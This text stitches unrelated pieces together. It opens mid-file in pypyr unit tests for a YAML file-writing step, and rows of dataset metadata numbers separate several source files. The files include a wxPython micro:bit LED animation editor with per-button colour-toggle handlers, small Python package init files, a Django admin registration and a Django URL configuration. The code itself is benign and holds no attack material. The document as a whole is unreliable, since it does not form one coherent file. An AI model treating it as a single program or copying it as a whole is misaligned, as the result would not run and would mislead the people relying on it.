assert context['fileWriteYaml'] == {'path': '/arb/blah',
'payload': [
'first',
'second',
{'a': 'b',
'c': 123.45,
'd': [0, 1, 2]},
12,
True
]}
mock_path.assert_called_once_with('/arb/blah')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == (' - first\n'
' - second\n'
' - a: b\n'
' c: 123.45\n'
' d:\n'
' - 0\n'
' - 1\n'
' - 2\n'
' - 12\n'
' - true\n')
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_no_payload_substitutions(mock_path):
"""Success case writes all context out with substitutions."""
context = Context({
'k1': 'v1',
'pathkey': '/arb/path',
'parent': [0, 1, {'child': '{k1}'}],
'nested': '{parent[2][child]}',
'jsonify': Jsonify({'arb': 123}),
'fileWriteYaml': {
'path': '{pathkey}'
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 6, "context should have 6 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml'] == {'path': '{pathkey}'}
mock_path.assert_called_once_with('/arb/path')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == ('k1: v1\n'
'pathkey: /arb/path\n'
'parent:\n'
' - 0\n'
' - 1\n'
' - child: v1\n'
'nested: v1\n'
'jsonify: \'{"arb": 123}\'\n'
'fileWriteYaml:\n'
' path: /arb/path\n')
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_with_payload_substitutions(mock_path):
"""Success case writes only specified context with substitutions."""
context = Context({
'k1': 'v1',
'intkey': 3,
'pathkey': '/arb/path',
'parent': [0,
1,
{'child': ['{k1}',
'{intkey}',
['a', 'b', 'c']
]}],
'nested': '{parent[2][child]}',
'fileWriteYaml': {
'path': '{pathkey}',
'payload': '{parent[2]}'
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 6, "context should have 6 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml'] == {'path': '{pathkey}',
'payload': '{parent[2]}'}
assert context['parent'] == [0,
1,
{'child': ['{k1}',
'{intkey}',
['a', 'b', 'c']
]
}
]
mock_path.assert_called_once_with('/arb/path')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == ('child:\n'
' - v1\n'
' - 3\n'
' - - a\n'
' - b\n'
' - c\n')
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_with_empty_payload(mock_path):
"""Empty payload write empty file."""
context = Context({
'k1': 'v1',
'fileWriteYaml': {
'path': '/arb/blah',
'payload': ''
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 2, "context should have 2 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml']['path'] == '/arb/blah'
assert context['fileWriteYaml']['payload'] == ''
mock_path.assert_called_once_with('/arb/blah')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == "''\n"
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_with_none_payload(mock_path):
"""None payload write empty file."""
context = Context({
'k1': 'v1',
'fileWriteYaml': {
'path': '/arb/blah',
'payload': None
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 2, "context should have 2 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml']['path'] == '/arb/blah'
assert context['fileWriteYaml']['payload'] is None
mock_path.assert_called_once_with('/arb/blah')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == "null\n...\n"
| 38.073964 | 77 | 0.500194 | 1,262 | 12,869 | 4.920761 | 0.097464 | 0.046055 | 0.066667 | 0.057971 | 0.861997 | 0.841546 | 0.809179 | 0.781643 | 0.76248 | 0.742834 | 0 | 0.014471 | 0.38247 | 12,869 | 337 | 78 | 38.186944 | 0.766956 | 0.064418 | 0 | 0.666667 | 0 | 0 | 0.193419 | 0.05228 | 0 | 0 | 0 | 0 | 0.215909 | 1 | 0.041667 | false | 0.022727 | 0.026515 | 0 | 0.068182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f6f531ba779d05b5a707ec418483c4c355b22d21 | 106 | py | Python | configuration/__init__.py | jameshi16/TypeSound | 238d019ed22ed5b41df533ac5ec43cbf28428fa6 | [
"MIT"
] | null | null | null | configuration/__init__.py | jameshi16/TypeSound | 238d019ed22ed5b41df533ac5ec43cbf28428fa6 | [
"MIT"
] | null | null | null | configuration/__init__.py | jameshi16/TypeSound | 238d019ed22ed5b41df533ac5ec43cbf28428fa6 | [
"MIT"
] | null | null | null | from .JSONConfiguration import JSONConfiguration
from .ConfigurationSchemeV1 import ConfigurationSchemeV1
| 35.333333 | 56 | 0.90566 | 8 | 106 | 12 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020408 | 0.075472 | 106 | 2 | 57 | 53 | 0.959184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
10009abf66e4f0be051afb1ebe07af87fb037f7f | 21 | py | Python | unet3d/models/pytorch/fcn/__init__.py | Crush18/3DUnetCNN | 7e257f712bd11510ebefef44c13ef48329858fca | [
"MIT"
] | 1,624 | 2017-02-15T13:41:39.000Z | 2022-03-29T11:51:57.000Z | unet3d/models/pytorch/fcn/__init__.py | hjt996/3DUnetCNN | be2573c52169b725075acf182374f7098ee792d1 | [
"MIT"
] | 271 | 2017-02-15T22:46:04.000Z | 2022-03-27T11:04:59.000Z | unet3d/models/pytorch/fcn/__init__.py | hjt996/3DUnetCNN | be2573c52169b725075acf182374f7098ee792d1 | [
"MIT"
] | 663 | 2017-02-23T04:27:51.000Z | 2022-03-31T06:36:30.000Z | from .fcn import FCN
| 10.5 | 20 | 0.761905 | 4 | 21 | 4 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 21 | 1 | 21 | 21 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1003f410d96dc9245c1ff654bfcf6fa6a747d2d1 | 19,288 | py | Python | MyProject1MyFrame1.py | SaitoYutaka/microbitAnim | 6630d5cdb3ae867d3467a035a1c14358944c0367 | [
"MIT"
] | null | null | null | MyProject1MyFrame1.py | SaitoYutaka/microbitAnim | 6630d5cdb3ae867d3467a035a1c14358944c0367 | [
"MIT"
] | null | null | null | MyProject1MyFrame1.py | SaitoYutaka/microbitAnim | 6630d5cdb3ae867d3467a035a1c14358944c0367 | [
"MIT"
] | null | null | null | """Subclass of MyFrame1, which is generated by wxFormBuilder."""
import wx
import microbitAnim
import json
# Implementing MyFrame1
class MyProject1MyFrame1( microbitAnim.MyFrame1 ):
def __init__( self, parent ):
microbitAnim.MyFrame1.__init__( self, parent )
# Handlers for MyFrame1 events.
def onButton00Click( self, event ):
if (self.m_button00.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button00.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button00.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton01Click( self, event ):
if (self.m_button01.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button01.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button01.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton02Click( self, event ):
if (self.m_button02.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button02.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button02.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton03Click( self, event ):
if (self.m_button03.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button03.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button03.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton04Click( self, event ):
if (self.m_button04.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button04.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button04.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
###
def onButton10Click( self, event ):
if (self.m_button10.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button10.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button10.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton11Click( self, event ):
if (self.m_button11.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button11.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button11.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton12Click( self, event ):
if (self.m_button12.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button12.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button12.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton13Click( self, event ):
if (self.m_button13.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button13.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button13.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton14Click( self, event ):
if (self.m_button14.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button14.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button14.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
###
def onButton20Click( self, event ):
if (self.m_button20.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button20.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button20.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton21Click( self, event ):
if (self.m_button21.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button21.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button21.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton22Click( self, event ):
if (self.m_button22.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button22.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button22.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton23Click( self, event ):
if (self.m_button23.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button23.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button23.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton24Click( self, event ):
if (self.m_button24.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button24.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button24.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
###
def onButton30Click( self, event ):
if (self.m_button30.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button30.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button30.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton31Click( self, event ):
if (self.m_button31.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button31.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button31.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton32Click( self, event ):
if (self.m_button32.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button32.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button32.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton33Click( self, event ):
if (self.m_button33.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button33.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button33.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton34Click( self, event ):
if (self.m_button34.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button34.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button34.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
###
def onButton40Click( self, event ):
if (self.m_button40.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button40.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button40.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton41Click( self, event ):
if (self.m_button41.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button41.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button41.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton42Click( self, event ):
if (self.m_button42.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button42.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button42.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton43Click( self, event ):
if (self.m_button43.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button43.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button43.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton44Click( self, event ):
if (self.m_button44.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button44.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button44.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def getDisplayString( self ):
s = [
['0','0','0','0','0'],
['0','0','0','0','0'],
['0','0','0','0','0'],
['0','0','0','0','0'],
['0','0','0','0','0']
]
if (self.m_button00.BackgroundColour == wx.Colour( 255, 0, 0 )): s[0][0] = '6'
if (self.m_button01.BackgroundColour == wx.Colour( 255, 0, 0 )): s[0][1] = '6'
if (self.m_button02.BackgroundColour == wx.Colour( 255, 0, 0 )): s[0][2] = '6'
if (self.m_button03.BackgroundColour == wx.Colour( 255, 0, 0 )): s[0][3] = '6'
if (self.m_button04.BackgroundColour == wx.Colour( 255, 0, 0 )): s[0][4] = '6'
if (self.m_button10.BackgroundColour == wx.Colour( 255, 0, 0 )): s[1][0] = '6'
if (self.m_button11.BackgroundColour == wx.Colour( 255, 0, 0 )): s[1][1] = '6'
if (self.m_button12.BackgroundColour == wx.Colour( 255, 0, 0 )): s[1][2] = '6'
if (self.m_button13.BackgroundColour == wx.Colour( 255, 0, 0 )): s[1][3] = '6'
if (self.m_button14.BackgroundColour == wx.Colour( 255, 0, 0 )): s[1][4] = '6'
if (self.m_button20.BackgroundColour == wx.Colour( 255, 0, 0 )): s[2][0] = '6'
if (self.m_button21.BackgroundColour == wx.Colour( 255, 0, 0 )): s[2][1] = '6'
if (self.m_button22.BackgroundColour == wx.Colour( 255, 0, 0 )): s[2][2] = '6'
if (self.m_button23.BackgroundColour == wx.Colour( 255, 0, 0 )): s[2][3] = '6'
if (self.m_button24.BackgroundColour == wx.Colour( 255, 0, 0 )): s[2][4] = '6'
if (self.m_button30.BackgroundColour == wx.Colour( 255, 0, 0 )): s[3][0] = '6'
if (self.m_button31.BackgroundColour == wx.Colour( 255, 0, 0 )): s[3][1] = '6'
if (self.m_button32.BackgroundColour == wx.Colour( 255, 0, 0 )): s[3][2] = '6'
if (self.m_button33.BackgroundColour == wx.Colour( 255, 0, 0 )): s[3][3] = '6'
if (self.m_button34.BackgroundColour == wx.Colour( 255, 0, 0 )): s[3][4] = '6'
if (self.m_button40.BackgroundColour == wx.Colour( 255, 0, 0 )): s[4][0] = '6'
if (self.m_button41.BackgroundColour == wx.Colour( 255, 0, 0 )): s[4][1] = '6'
if (self.m_button42.BackgroundColour == wx.Colour( 255, 0, 0 )): s[4][2] = '6'
if (self.m_button43.BackgroundColour == wx.Colour( 255, 0, 0 )): s[4][3] = '6'
if (self.m_button44.BackgroundColour == wx.Colour( 255, 0, 0 )): s[4][4] = '6'
dispStr = \
s[0][0] + s[0][1] + s[0][2] + s[0][3] + s[0][4] + ':' +\
s[1][0] + s[1][1] + s[1][2] + s[1][3] + s[1][4] + ':' +\
s[2][0] + s[2][1] + s[2][2] + s[2][3] + s[2][4] + ':' +\
s[3][0] + s[3][1] + s[3][2] + s[3][3] + s[3][4] + ':' +\
s[4][0] + s[4][1] + s[4][2] + s[4][3] + s[4][4]
return dispStr
def OnMenuSaveSelect( self, event ):
with wx.FileDialog(self, "Save json file", wildcard="XYZ files (*.json)|*.json",
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
try:
with open(pathname, 'w') as file:
s = self.getDisplayString()
print(s)
d = {}
d["anim01"] = s
str_ = json.dumps(d)
file.write(str_)
except IOError:
wx.LogError("Cannot save current data in file '%s'." % pathname)
def OnMenuQuitSelect( self, event ):
quit()
def OnMenuOpenSelect( self, event):
with wx.FileDialog(self, "Open json file", wildcard="json files (*.json)|*.json",
style=wx.FD_OPEN ) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
try:
with open(pathname, 'r') as f:
data = json.load(f)
i = []
i = data["anim01"].split(':')
self.m_button00.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button01.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button02.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button03.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button04.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button10.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button11.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button12.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button13.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button14.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button20.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button21.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button22.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button23.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button24.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button30.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button31.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button32.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button33.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button34.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button40.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button41.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button42.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button43.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
self.m_button44.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
if i[0][0] == '1': self.m_button00.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[0][1] == '1': self.m_button01.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[0][2] == '1': self.m_button02.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[0][3] == '1': self.m_button03.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[0][4] == '1': self.m_button04.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[1][0] == '1': self.m_button10.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[1][1] == '1': self.m_button11.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[1][2] == '1': self.m_button12.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[1][3] == '1': self.m_button13.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[1][4] == '1': self.m_button14.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[2][0] == '1': self.m_button20.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[2][1] == '1': self.m_button21.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[2][2] == '1': self.m_button22.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[2][3] == '1': self.m_button23.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[2][4] == '1': self.m_button24.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[3][0] == '1': self.m_button30.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[3][1] == '1': self.m_button31.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[3][2] == '1': self.m_button32.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[3][3] == '1': self.m_button33.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[3][4] == '1': self.m_button34.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[4][0] == '1': self.m_button40.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[4][1] == '1': self.m_button41.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[4][2] == '1': self.m_button42.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[4][3] == '1': self.m_button43.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
if i[4][4] == '1': self.m_button44.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
except IOError:
wx.LogError("Cannot open current data in file '%s'." % pathname)
def OnExportPythonSelect( self, event ):
anim = self.getDisplayString()
tmp = anim.split(":")
anim00 = tmp[0] + ":" + tmp[1] + ":" + tmp[2] + ":" + tmp[3] + ":" + tmp[4]
anim01 = "00000" + ":" + tmp[0] + ":" + tmp[1] + ":" + tmp[2] + ":" + tmp[3]
anim02 = "00000" + ":" + "00000" + ":" + tmp[0] + ":" + tmp[1] + ":" + tmp[2]
anim03 = "00000" + ":" + "00000" + ":" + "00000" + ":" + tmp[0] + ":" + tmp[1]
anim04 = "00000" + ":" + "00000" + ":" + "00000" + ":" + "00000" + ":" + tmp[0]
anim05 = "00000" + ":" + "00000" + ":" + "00000" + ":" + "00000" + ":" + "00000"
anim06 = tmp[4] + ":" + "00000" + ":" + "00000" + ":" + "00000" + ":" + "00000"
anim07 = tmp[3] + ":" + tmp[4] + ":" + "00000" + ":" + "00000" + ":" + "00000"
anim08 = tmp[2] + ":" + tmp[3] + ":" + tmp[4] + ":" + "00000" + ":" + "00000"
anim09 = tmp[1] + ":" + tmp[2] + ":" + tmp[3] + ":" + tmp[4] + ":" + "00000"
anim00 = "anim00 = Image(\"" + anim00 + "\")"
anim01 = "anim01 = Image(\"" + anim01 + "\")"
anim02 = "anim02 = Image(\"" + anim02 + "\")"
anim03 = "anim03 = Image(\"" + anim03 + "\")"
anim04 = "anim04 = Image(\"" + anim04 + "\")"
anim05 = "anim05 = Image(\"" + anim05 + "\")"
anim06 = "anim06 = Image(\"" + anim06 + "\")"
anim07 = "anim07 = Image(\"" + anim07 + "\")"
anim08 = "anim08 = Image(\"" + anim08 + "\")"
anim09 = "anim09 = Image(\"" + anim09 + "\")"
print("from microbit import *")
print(anim00)
print(anim01)
print(anim02)
print(anim03)
print(anim04)
print(anim05)
print("anim = [anim00, anim01, anim02, anim03, anim04, anim05]")
print("display.show(anim, delay=200)")
with wx.FileDialog(self, "Export Python code", wildcard="Python files (*.py)|*.py",
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
try:
with open(pathname, 'w') as file:
file.writelines("from microbit import *\n")
file.writelines(anim00 + "\n")
file.writelines(anim01 + "\n")
file.writelines(anim02 + "\n")
file.writelines(anim03 + "\n")
file.writelines(anim04 + "\n")
file.writelines(anim05 + "\n")
file.writelines(anim06 + "\n")
file.writelines(anim07 + "\n")
file.writelines(anim08 + "\n")
file.writelines(anim09 + "\n")
file.writelines("anim = [\n")
file.writelines(" anim00, anim01, anim02, anim03, anim04, anim05, anim06,\n")
file.writelines(" anim07, anim08, anim09]\n")
file.writelines("while True:\n")
file.writelines(" display.show(anim, delay=200)\n")
except IOError:
wx.LogError("Cannot save current data in file '%s'." % pathname)
| 49.07888 | 100 | 0.541736 | 2,371 | 19,288 | 4.335302 | 0.067904 | 0.044168 | 0.107014 | 0.116743 | 0.821481 | 0.776827 | 0.756299 | 0.748906 | 0.738982 | 0.463664 | 0 | 0.112478 | 0.291995 | 19,288 | 392 | 101 | 49.204082 | 0.640231 | 0.005755 | 0 | 0.374252 | 1 | 0 | 0.056582 | 0 | 0.01497 | 0 | 0 | 0 | 0 | 1 | 0.092814 | false | 0 | 0.01497 | 0 | 0.122754 | 0.02994 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
63f2572c889a9262373f6227159d791861867be3 | 200 | py | Python | accounts/admin.py | yamansener199/CS308-Project | 11b915c891494278db73dede565554704cbc8ae2 | [
"Apache-2.0"
] | 1 | 2021-11-13T11:35:40.000Z | 2021-11-13T11:35:40.000Z | accounts/admin.py | yamansener199/CS308-Project | 11b915c891494278db73dede565554704cbc8ae2 | [
"Apache-2.0"
] | null | null | null | accounts/admin.py | yamansener199/CS308-Project | 11b915c891494278db73dede565554704cbc8ae2 | [
"Apache-2.0"
] | 2 | 2021-11-11T14:22:38.000Z | 2021-11-13T11:35:42.000Z | from django.contrib import admin
from django.contrib.auth.models import User
from accounts.forms import Patient
# Register your models here.
from .models import *
admin.site.register(Patient)
| 25 | 44 | 0.785 | 28 | 200 | 5.607143 | 0.535714 | 0.127389 | 0.216561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 200 | 7 | 45 | 28.571429 | 0.923529 | 0.13 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
63f9ed819e0173a27119dd7c42b177025d72f2a6 | 239 | py | Python | mapping/urls.py | eshandinesh/gis_based_crime_mapping | 72ced819cf2a2c74654773e9f9869279852feb91 | [
"MIT"
] | 1 | 2020-11-16T17:12:33.000Z | 2020-11-16T17:12:33.000Z | mapping/urls.py | eshandinesh/gis_based_crime_mapping | 72ced819cf2a2c74654773e9f9869279852feb91 | [
"MIT"
] | null | null | null | mapping/urls.py | eshandinesh/gis_based_crime_mapping | 72ced819cf2a2c74654773e9f9869279852feb91 | [
"MIT"
] | 1 | 2020-12-19T20:11:32.000Z | 2020-12-19T20:11:32.000Z | from django.conf.urls import include,url
from . import views
from django.conf.urls import *
from django.conf.urls.static import static
from django.conf import settings
urlpatterns =[
url(r'^home$', views.HOTSPOTS, name='home'),
]
